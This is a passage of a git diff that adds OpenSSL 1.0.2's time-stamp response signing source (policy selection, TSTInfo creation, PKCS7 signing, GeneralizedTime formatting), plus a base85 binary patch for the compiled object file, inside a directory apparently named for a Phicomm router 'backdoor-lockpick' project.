+                                    "Bad message digest.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_BAD_DATA_FORMAT);
+        return 0;
+    }
+
+    return 1;
+}
+
+/* Returns the TSA policy based on the requested and acceptable policies. */
+static ASN1_OBJECT *TS_RESP_get_policy(TS_RESP_CTX *ctx)
+{
+    ASN1_OBJECT *requested = TS_REQ_get_policy_id(ctx->request);
+    ASN1_OBJECT *policy = NULL;
+    int i;
+
+    if (ctx->default_policy == NULL) {
+        TSerr(TS_F_TS_RESP_GET_POLICY, TS_R_INVALID_NULL_POINTER);
+        return NULL;
+    }
+    /*
+     * Return the default policy if none is requested or the default is
+     * requested.
+     */
+    if (!requested || !OBJ_cmp(requested, ctx->default_policy))
+        policy = ctx->default_policy;
+
+    /* Check if the policy is acceptable. */
+    for (i = 0; !policy && i < sk_ASN1_OBJECT_num(ctx->policies); ++i) {
+        ASN1_OBJECT *current = sk_ASN1_OBJECT_value(ctx->policies, i);
+        if (!OBJ_cmp(requested, current))
+            policy = current;
+    }
+    if (!policy) {
+        TSerr(TS_F_TS_RESP_GET_POLICY, TS_R_UNACCEPTABLE_POLICY);
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Requested policy is not " "supported.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_UNACCEPTED_POLICY);
+    }
+    return policy;
+}
+
+/* Creates the TS_TST_INFO object based on the settings of the context. */
+static TS_TST_INFO *TS_RESP_create_tst_info(TS_RESP_CTX *ctx,
+                                            ASN1_OBJECT *policy)
+{
+    int result = 0;
+    TS_TST_INFO *tst_info = NULL;
+    ASN1_INTEGER *serial = NULL;
+    ASN1_GENERALIZEDTIME *asn1_time = NULL;
+    long sec, usec;
+    TS_ACCURACY *accuracy = NULL;
+    const ASN1_INTEGER *nonce;
+    GENERAL_NAME *tsa_name = NULL;
+
+    if (!(tst_info = TS_TST_INFO_new()))
+        goto end;
+    if (!TS_TST_INFO_set_version(tst_info, 1))
+        goto end;
+    if (!TS_TST_INFO_set_policy_id(tst_info, policy))
+        goto end;
+    if (!TS_TST_INFO_set_msg_imprint(tst_info, ctx->request->msg_imprint))
+        goto end;
+    if (!(serial = (*ctx->serial_cb) (ctx, ctx->serial_cb_data))
+        || !TS_TST_INFO_set_serial(tst_info, serial))
+        goto end;
+    if (!(*ctx->time_cb) (ctx, ctx->time_cb_data, &sec, &usec)
+        || !(asn1_time = TS_RESP_set_genTime_with_precision(NULL,
+                                                            sec, usec,
+                                                            ctx->clock_precision_digits))
+        || !TS_TST_INFO_set_time(tst_info, asn1_time))
+        goto end;
+
+    /* Setting accuracy if needed. */
+    if ((ctx->seconds || ctx->millis || ctx->micros)
+        && !(accuracy = TS_ACCURACY_new()))
+        goto end;
+
+    if (ctx->seconds && !TS_ACCURACY_set_seconds(accuracy, ctx->seconds))
+        goto end;
+    if (ctx->millis && !TS_ACCURACY_set_millis(accuracy, ctx->millis))
+        goto end;
+    if (ctx->micros && !TS_ACCURACY_set_micros(accuracy, ctx->micros))
+        goto end;
+    if (accuracy && !TS_TST_INFO_set_accuracy(tst_info, accuracy))
+        goto end;
+
+    /* Setting ordering. */
+    if ((ctx->flags & TS_ORDERING)
+        && !TS_TST_INFO_set_ordering(tst_info, 1))
+        goto end;
+
+    /* Setting nonce if needed. */
+    if ((nonce = TS_REQ_get_nonce(ctx->request)) != NULL
+        && !TS_TST_INFO_set_nonce(tst_info, nonce))
+        goto end;
+
+    /* Setting TSA name to subject of signer certificate. */
+    if (ctx->flags & TS_TSA_NAME) {
+        if (!(tsa_name = GENERAL_NAME_new()))
+            goto end;
+        tsa_name->type = GEN_DIRNAME;
+        tsa_name->d.dirn =
+            X509_NAME_dup(ctx->signer_cert->cert_info->subject);
+        if (!tsa_name->d.dirn)
+            goto end;
+        if (!TS_TST_INFO_set_tsa(tst_info, tsa_name))
+            goto end;
+    }
+
+    result = 1;
+ end:
+    if (!result) {
+        TS_TST_INFO_free(tst_info);
+        tst_info = NULL;
+        TSerr(TS_F_TS_RESP_CREATE_TST_INFO, TS_R_TST_INFO_SETUP_ERROR);
+        TS_RESP_CTX_set_status_info_cond(ctx, TS_STATUS_REJECTION,
+                                         "Error during TSTInfo "
+                                         "generation.");
+    }
+    GENERAL_NAME_free(tsa_name);
+    TS_ACCURACY_free(accuracy);
+    ASN1_GENERALIZEDTIME_free(asn1_time);
+    ASN1_INTEGER_free(serial);
+
+    return tst_info;
+}
+
+/* Processing the extensions of the request. */
+static int TS_RESP_process_extensions(TS_RESP_CTX *ctx)
+{
+    STACK_OF(X509_EXTENSION) *exts = TS_REQ_get_exts(ctx->request);
+    int i;
+    int ok = 1;
+
+    for (i = 0; ok && i < sk_X509_EXTENSION_num(exts); ++i) {
+        X509_EXTENSION *ext = sk_X509_EXTENSION_value(exts, i);
+        /*
+         * XXXXX The last argument was previously (void *)ctx->extension_cb,
+         * but ISO C doesn't permit converting a function pointer to void *.
+         * For lack of better information, I'm placing a NULL there instead.
+         * The callback can pick its own address out from the ctx anyway...
+         */
+        ok = (*ctx->extension_cb) (ctx, ext, NULL);
+    }
+
+    return ok;
+}
+
+/* Functions for signing the TS_TST_INFO structure of the context. */
+static int TS_RESP_sign(TS_RESP_CTX *ctx)
+{
+    int ret = 0;
+    PKCS7 *p7 = NULL;
+    PKCS7_SIGNER_INFO *si;
+    STACK_OF(X509) *certs;      /* Certificates to include in sc. */
+    ESS_SIGNING_CERT *sc = NULL;
+    ASN1_OBJECT *oid;
+    BIO *p7bio = NULL;
+    int i;
+
+    /* Check if signcert and pkey match. */
+    if (!X509_check_private_key(ctx->signer_cert, ctx->signer_key)) {
+        TSerr(TS_F_TS_RESP_SIGN, TS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE);
+        goto err;
+    }
+
+    /* Create a new PKCS7 signed object. */
+    if (!(p7 = PKCS7_new())) {
+        TSerr(TS_F_TS_RESP_SIGN, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (!PKCS7_set_type(p7, NID_pkcs7_signed))
+        goto err;
+
+    /* Force SignedData version to be 3 instead of the default 1. */
+    if (!ASN1_INTEGER_set(p7->d.sign->version, 3))
+        goto err;
+
+    /* Add signer certificate and optional certificate chain. */
+    if (TS_REQ_get_cert_req(ctx->request)) {
+        PKCS7_add_certificate(p7, ctx->signer_cert);
+        if (ctx->certs) {
+            for (i = 0; i < sk_X509_num(ctx->certs); ++i) {
+                X509 *cert = sk_X509_value(ctx->certs, i);
+                PKCS7_add_certificate(p7, cert);
+            }
+        }
+    }
+
+    /* Add a new signer info. */
+    if (!(si = PKCS7_add_signature(p7, ctx->signer_cert,
+                                   ctx->signer_key, EVP_sha1()))) {
+        TSerr(TS_F_TS_RESP_SIGN, TS_R_PKCS7_ADD_SIGNATURE_ERROR);
+        goto err;
+    }
+
+    /* Add content type signed attribute to the signer info. */
+    oid = OBJ_nid2obj(NID_id_smime_ct_TSTInfo);
+    if (!PKCS7_add_signed_attribute(si, NID_pkcs9_contentType,
+                                    V_ASN1_OBJECT, oid)) {
+        TSerr(TS_F_TS_RESP_SIGN, TS_R_PKCS7_ADD_SIGNED_ATTR_ERROR);
+        goto err;
+    }
+
+    /*
+     * Create the ESS SigningCertificate attribute which contains the signer
+     * certificate id and optionally the certificate chain.
+     */
+    certs = ctx->flags & TS_ESS_CERT_ID_CHAIN ? ctx->certs : NULL;
+    if (!(sc = ESS_SIGNING_CERT_new_init(ctx->signer_cert, certs)))
+        goto err;
+
+    /* Add SigningCertificate signed attribute to the signer info. */
+    if (!ESS_add_signing_cert(si, sc)) {
+        TSerr(TS_F_TS_RESP_SIGN, TS_R_ESS_ADD_SIGNING_CERT_ERROR);
+        goto err;
+    }
+
+    /* Add a new empty NID_id_smime_ct_TSTInfo encapsulated content. */
+    if (!TS_TST_INFO_content_new(p7))
+        goto err;
+
+    /* Add the DER encoded tst_info to the PKCS7 structure. */
+    if (!(p7bio = PKCS7_dataInit(p7, NULL))) {
+        TSerr(TS_F_TS_RESP_SIGN, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    /* Convert tst_info to DER. */
+    if (!i2d_TS_TST_INFO_bio(p7bio, ctx->tst_info)) {
+        TSerr(TS_F_TS_RESP_SIGN, TS_R_TS_DATASIGN);
+        goto err;
+    }
+
+    /* Create the signature and add it to the signer info. */
+    if (!PKCS7_dataFinal(p7, p7bio)) {
+        TSerr(TS_F_TS_RESP_SIGN, TS_R_TS_DATASIGN);
+        goto err;
+    }
+
+    /* Set new PKCS7 and TST_INFO objects. */
+    TS_RESP_set_tst_info(ctx->response, p7, ctx->tst_info);
+    p7 = NULL;                  /* Ownership is lost. */
+    ctx->tst_info = NULL;       /* Ownership is lost. */
+
+    ret = 1;
+ err:
+    if (!ret)
+        TS_RESP_CTX_set_status_info_cond(ctx, TS_STATUS_REJECTION,
+                                         "Error during signature "
+                                         "generation.");
+    BIO_free_all(p7bio);
+    ESS_SIGNING_CERT_free(sc);
+    PKCS7_free(p7);
+    return ret;
+}
+
+static ESS_SIGNING_CERT *ESS_SIGNING_CERT_new_init(X509 *signcert,
+                                                   STACK_OF(X509) *certs)
+{
+    ESS_CERT_ID *cid;
+    ESS_SIGNING_CERT *sc = NULL;
+    int i;
+
+    /* Creating the ESS_CERT_ID stack. */
+    if (!(sc = ESS_SIGNING_CERT_new()))
+        goto err;
+    if (!sc->cert_ids && !(sc->cert_ids = sk_ESS_CERT_ID_new_null()))
+        goto err;
+
+    /* Adding the signing certificate id. */
+    if (!(cid = ESS_CERT_ID_new_init(signcert, 0))
+        || !sk_ESS_CERT_ID_push(sc->cert_ids, cid))
+        goto err;
+    /* Adding the certificate chain ids. */
+    for (i = 0; i < sk_X509_num(certs); ++i) {
+        X509 *cert = sk_X509_value(certs, i);
+        if (!(cid = ESS_CERT_ID_new_init(cert, 1))
+            || !sk_ESS_CERT_ID_push(sc->cert_ids, cid))
+            goto err;
+    }
+
+    return sc;
+ err:
+    ESS_SIGNING_CERT_free(sc);
+    TSerr(TS_F_ESS_SIGNING_CERT_NEW_INIT, ERR_R_MALLOC_FAILURE);
+    return NULL;
+}
+
+static ESS_CERT_ID *ESS_CERT_ID_new_init(X509 *cert, int issuer_needed)
+{
+    ESS_CERT_ID *cid = NULL;
+    GENERAL_NAME *name = NULL;
+
+    /* Recompute SHA1 hash of certificate if necessary (side effect). */
+    X509_check_purpose(cert, -1, 0);
+
+    if (!(cid = ESS_CERT_ID_new()))
+        goto err;
+    if (!ASN1_OCTET_STRING_set(cid->hash, cert->sha1_hash,
+                               sizeof(cert->sha1_hash)))
+        goto err;
+
+    /* Setting the issuer/serial if requested. */
+    if (issuer_needed) {
+        /* Creating issuer/serial structure. */
+        if (!cid->issuer_serial
+            && !(cid->issuer_serial = ESS_ISSUER_SERIAL_new()))
+            goto err;
+        /* Creating general name from the certificate issuer. */
+        if (!(name = GENERAL_NAME_new()))
+            goto err;
+        name->type = GEN_DIRNAME;
+        if (!(name->d.dirn = X509_NAME_dup(cert->cert_info->issuer)))
+            goto err;
+        if (!sk_GENERAL_NAME_push(cid->issuer_serial->issuer, name))
+            goto err;
+        name = NULL;            /* Ownership is lost. */
+        /* Setting the serial number. */
+        ASN1_INTEGER_free(cid->issuer_serial->serial);
+        if (!(cid->issuer_serial->serial =
+              ASN1_INTEGER_dup(cert->cert_info->serialNumber)))
+            goto err;
+    }
+
+    return cid;
+ err:
+    GENERAL_NAME_free(name);
+    ESS_CERT_ID_free(cid);
+    TSerr(TS_F_ESS_CERT_ID_NEW_INIT, ERR_R_MALLOC_FAILURE);
+    return NULL;
+}
+
+static int TS_TST_INFO_content_new(PKCS7 *p7)
+{
+    PKCS7 *ret = NULL;
+    ASN1_OCTET_STRING *octet_string = NULL;
+
+    /* Create new encapsulated NID_id_smime_ct_TSTInfo content. */
+    if (!(ret = PKCS7_new()))
+        goto err;
+    if (!(ret->d.other = ASN1_TYPE_new()))
+        goto err;
+    ret->type = OBJ_nid2obj(NID_id_smime_ct_TSTInfo);
+    if (!(octet_string = ASN1_OCTET_STRING_new()))
+        goto err;
+    ASN1_TYPE_set(ret->d.other, V_ASN1_OCTET_STRING, octet_string);
+    octet_string = NULL;
+
+    /* Add encapsulated content to signed PKCS7 structure. */
+    if (!PKCS7_set_content(p7, ret))
+        goto err;
+
+    return 1;
+ err:
+    ASN1_OCTET_STRING_free(octet_string);
+    PKCS7_free(ret);
+    return 0;
+}
+
+static int ESS_add_signing_cert(PKCS7_SIGNER_INFO *si, ESS_SIGNING_CERT *sc)
+{
+    ASN1_STRING *seq = NULL;
+    unsigned char *p, *pp = NULL;
+    int len;
+
+    len = i2d_ESS_SIGNING_CERT(sc, NULL);
+    if (!(pp = (unsigned char *)OPENSSL_malloc(len))) {
+        TSerr(TS_F_ESS_ADD_SIGNING_CERT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    p = pp;
+    i2d_ESS_SIGNING_CERT(sc, &p);
+    if (!(seq = ASN1_STRING_new()) || !ASN1_STRING_set(seq, pp, len)) {
+        TSerr(TS_F_ESS_ADD_SIGNING_CERT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    OPENSSL_free(pp);
+    pp = NULL;
+    return PKCS7_add_signed_attribute(si,
+                                      NID_id_smime_aa_signingCertificate,
+                                      V_ASN1_SEQUENCE, seq);
+ err:
+    ASN1_STRING_free(seq);
+    OPENSSL_free(pp);
+
+    return 0;
+}
+
+static ASN1_GENERALIZEDTIME
+*TS_RESP_set_genTime_with_precision(ASN1_GENERALIZEDTIME *asn1_time,
+                                    long sec, long usec, unsigned precision)
+{
+    time_t time_sec = (time_t)sec;
+    struct tm *tm = NULL;
+    char genTime_str[17 + TS_MAX_CLOCK_PRECISION_DIGITS];
+    char *p = genTime_str;
+    char *p_end = genTime_str + sizeof(genTime_str);
+
+    if (precision > TS_MAX_CLOCK_PRECISION_DIGITS)
+        goto err;
+
+    if (!(tm = gmtime(&time_sec)))
+        goto err;
+
+    /*
+     * Put "genTime_str" in GeneralizedTime format.  We work around the
+     * restrictions imposed by rfc3280 (i.e. "GeneralizedTime values MUST
+     * NOT include fractional seconds") and OpenSSL related functions to
+     * meet the rfc3161 requirement: "GeneralizedTime syntax can include
+     * fraction-of-second details".
+     */
+    p += BIO_snprintf(p, p_end - p,
+                      "%04d%02d%02d%02d%02d%02d",
+                      tm->tm_year + 1900, tm->tm_mon + 1, tm->tm_mday,
+                      tm->tm_hour, tm->tm_min, tm->tm_sec);
+    if (precision > 0) {
+        /* Add fraction of seconds (leave space for dot and null). */
+        BIO_snprintf(p, 2 + precision, ".%06ld", usec);
+        /*
+         * We cannot use the snprintf return value, because it might have
+         * been truncated.
+         */
+        p += strlen(p);
+
+        /*
+         * To make things a bit harder, X.690 | ISO/IEC 8825-1 provides the
+         * following restrictions for a DER-encoding, which OpenSSL
+         * (specifically ASN1_GENERALIZEDTIME_check() function) doesn't
+         * support: "The encoding MUST terminate with a "Z" (which means
+         * "Zulu" time). The decimal point element, if present, MUST be the
+         * point option ".". The fractional-seconds elements, if present,
+         * MUST omit all trailing 0's; if the elements correspond to 0, they
+         * MUST be wholly omitted, and the decimal point element also MUST be
+         * omitted."
+         */
+        /*
+         * Remove trailing zeros. The dot guarantees the exit condition of
+         * this loop even if all the digits are zero.
+         */
+        while (*--p == '0')
+            /*
+             * empty
+             */ ;
+        /* p points to either the dot or the last non-zero digit. */
+        if (*p != '.')
+            ++p;
+    }
+    /* Add the trailing Z and the terminating null. */
+    *p++ = 'Z';
+    *p++ = '\0';
+
+    /* Now call OpenSSL to check and set our genTime value */
+    if (!asn1_time && !(asn1_time = M_ASN1_GENERALIZEDTIME_new()))
+        goto err;
+    if (!ASN1_GENERALIZEDTIME_set_string(asn1_time, genTime_str)) {
+        ASN1_GENERALIZEDTIME_free(asn1_time);
+        goto err;
+    }
+
+    return asn1_time;
+ err:
+    TSerr(TS_F_TS_RESP_SET_GENTIME_WITH_PRECISION, TS_R_COULD_NOT_SET_TIME);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_sign.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts_rsp_sign.o
new file mode 100644
index 0000000000000000000000000000000000000000..9b28088b450e275bf4ecdc0f0a728bf1b09297f0
GIT binary patch
literal 19584
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
